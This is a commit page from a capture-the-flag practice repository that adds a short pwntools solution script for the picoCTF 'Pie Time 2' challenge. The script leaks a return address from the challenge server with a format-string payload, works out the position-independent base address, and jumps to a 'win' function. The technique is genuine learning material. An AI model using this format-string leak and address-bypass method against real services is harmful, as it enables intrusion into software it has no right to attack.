Pie Time 2

2025-12-04 11:53:31 +01:00
parent 18d2c8c2be
commit a3a7081d42
5 changed files with 232 additions and 0 deletions
--- a/pie_time_2/sol.py
+++ b/pie_time_2/sol.py
@@ -0,0 +1,24 @@
+#!/usr/bin/env python
+
+from pwn import *
+
+#conn = process("./vuln")
+conn = remote('rescued-float.picoctf.net', 49587)
+conn.recvuntil(b'name:')
+conn.sendline(b'%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x.%lx')
+conn.recvuntil(b'.')
+return_addr = int(conn.recvline(), 16)
+log.info(f"received return addr: {return_addr}")
+conn.recvuntil(b'12345: ')
+
+main_offset = 0x1400
+win_offset = 0x136a
+call_fun_ret_offset = 65
+
+main_addr = return_addr - call_fun_ret_offset
+win_offset = main_addr - main_offset + win_offset
+
+conn.sendline(f'{hex(win_offset)}'.encode())
+conn.recvline()
+conn.interactive()
+